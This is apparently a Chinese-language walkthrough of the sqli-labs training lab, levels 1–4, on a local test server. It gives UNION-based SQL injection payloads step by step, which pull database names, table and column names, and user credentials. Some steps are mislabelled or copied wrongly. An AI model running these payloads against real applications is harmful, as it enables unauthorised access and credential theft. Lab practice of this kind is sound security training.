目录
首先判断注入方式:
首先使用'、"等符号判断有没有sql注入的存在,然后判断sql语句的类型,接着利用sql语句的特点进行信息的获取。
?Less-1
1. 输入id=1:?
?2. 接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入http://127.0.0.1/sqli/Less-1/?id=1':
3. 输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入http://127.0.0.1/sqli/Less-1/?id=1' --+:
根据提示可以判断出后台的sql语句为:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";?
4. 接着使用order by 语句判断,该表中一共有几列数据;order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列:http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+和http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+:
?5. 将id=1改为一个数据库不存在的id值,如-1,使用union select 1,2,3联合查询语句查看页面是否有显示位:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+。
发现页面先输出了2和3,说明页面有2个显示位。
6. 然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息
?(1)报数据库名:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 这是一个查询数据库名信息的语句:
(2) 爆表名:查询security内的所有表名
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
(3)?爆出users表中的列名:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
(4)?接着使用如下语句查询所有的用户名,密码:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+
??Less-2
1. 输入id=1:?
2. 接着尝试在id后面加上'和",发现页面回显不正常,表示可能存在SQL字符注入http://127.0.0.1/sqli/Less-2/?id=1':
?http://127.0.0.1/sqli/Less-2/?id=1":
?根据提示可以判断出后台的sql语句为:$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
3. 输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入http://127.0.0.1/sqli/Less-2/?id=1?--+:
?其他步骤则与Less-1一致:
?id=1 order by 3--+? 判断字段数
?id=1 order by 4--+判断字段数
?id=-1 union select 1,database(),5 --+ 当前数据库
?id=-1?union select 1,user(),5 --+ 当前用户名
爆数据库
?id=-1?union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
SELECT * FROM users WHERE id=-?id=-1?union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ LIMIT 0,1
爆 security 数据表
?id=-1?union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
SELECT * FROM users WHERE ?id=-1?union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+ LIMIT 0,1
爆users表的列
?id=-1?union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
SELECT * FROM users WHERE ?id=-1?union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+ LIMIT 0,1
爆 users 的所有数据
?id=-1?union select 1,group_concat(username),group_concat(password) from users --+
SELECT * FROM users WHERE id=-1 union select 1,group_concat(username),group_concat(password) from users --+ LIMIT 0,1
Less-3
1. 输入id=1:?
?2. 接着尝试在id后面加上'和",发现页面回显不正常,表示可能存在SQL字符注入http://127.0.0.1/sqli/Less-3/?id=1':
?http://127.0.0.1/sqli/Less-3/?id=1'):
?根据提示可以判断出后台的sql语句为:$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
3. 输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入http://127.0.0.1/sqli/Less-3/?id=1') --+:
?其他步骤则与Less-1一致:
?id=1') order by 3--+? 判断字段数
?id=1') order by 4--+判断字段数
?id=-1') union select 1,database(),5 --+ 当前数据库
?id=-1')?union select 1,user(),5 --+ 当前用户名
爆数据库
?id=-1')?union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
SELECT * FROM users WHERE id=('-1') union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ LIMIT 0,1
爆 security 数据表
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
SELECT * FROM users WHERE ?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
爆users表的列
?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
SELECT * FROM users WHERE id=('-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+ LIMIT 0,1
爆 users 的所有数据
?id=-1') union select 1,group_concat(username),group_concat(password) from users --+
SELECT * FROM users WHERE id=('-1') union select 1,group_concat(username),group_concat(password) from users --+ LIMIT 0,1
Less-4
1. 输入id=1:?
?2. 接着尝试在id后面加上'和",发现页面回显不正常,表示可能存在SQL字符注入http://127.0.0.1/sqli/Less-4/?id=1':
?http://127.0.0.1/sqli/Less-4/?id=1":
?根据提示可以判断出后台的sql语句为:$sql="SELECT * FROM users WHERE id=("$id")?LIMIT 0,1";
3. 输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入http://127.0.0.1/sqli/Less-4/?id=1") --+:
?其他步骤则与Less-1一致:
?id=1") order by 3--+? 判断字段数
?id=1") order by 4--+判断字段数
?id=-1") union select 1,database(),5 --+ 当前数据库
?id=-1")?union select 1,user(),5 --+ 当前用户名
爆数据库
?id=-1")?union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
SELECT * FROM users WHERE id=("-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ LIMIT 0,1
爆 security 数据表
?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
SELECT * FROM users WHERE ?id=("-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
爆users表的列
?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
SELECT * FROM users WHERE id=("-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+ LIMIT 0,1
爆 users 的所有数据
?id=-1") union select 1,group_concat(username),group_concat(password) from users --+
SELECT * FROM users WHERE id=("-1") union select 1,group_concat(username),group_concat(password) from users --+ LIMIT 0,1